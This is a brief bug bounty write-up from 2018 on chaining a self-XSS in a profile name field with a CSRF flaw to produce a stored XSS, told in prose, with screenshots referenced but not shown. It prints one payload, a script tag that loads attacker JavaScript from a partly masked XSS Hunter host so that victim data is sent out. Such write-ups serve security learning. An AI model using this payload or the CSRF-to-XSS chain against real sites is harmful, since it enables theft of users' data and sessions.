Self-XSS + CSRF to Stored XSS

Renwa
3 min read · May 20, 2018


Hola, this is Renwa from Kurdistan. I'm glad to write my first write-up about infosec and bug bounties.

So I was digging in the website and finally I found an XSS: when a user wants to change his name, I added a simple payload and refreshed the page, bingo!

[Screenshot: user settings panel]
[Screenshot: XSS proof]

So the problem is that the profile is not public, and the only way to trigger the XSS is to tell the victim to change his own name to malicious JavaScript code. That is called Self-XSS, and on its own it has no impact.

I started Burp Suite and changed my name; the request looks like:

Hmm, that looks interesting. I generated a Burp Suite CSRF PoC:

Replayed in the browser, the response was:

Awesome! Now we have CSRF + Self-XSS. Let's chain them together; the form now looks like:

[Screenshot: Final PoC]

As you can see, in the last name field I have added the JavaScript code. It's from xsshunter.com, which generates XSS PoCs; you should give it a try.

“><script src=https://***.xss.ht></script>

And at the end I have added JavaScript that submits the form when the file loads, to make it more effective.

Now the user's name is changed to the JavaScript code. After he navigates to the homepage, the code runs in his browser and sends back all the info we need, since there wasn't any CSP protection.

[Screenshot: Stored XSS]

Going back to XSS Hunter, we can confirm it became a Stored XSS whenever any user opens our HTML form.

After all, thanks for reading. If I helped, clap hands for more write-ups about infosec. Remember: where there is a Self-XSS, always look for a CSRF to chain it together and make it stored. By Self-XSS I don't mean the user entering code into the browser console or a self-DOM XSS.

//Renwa
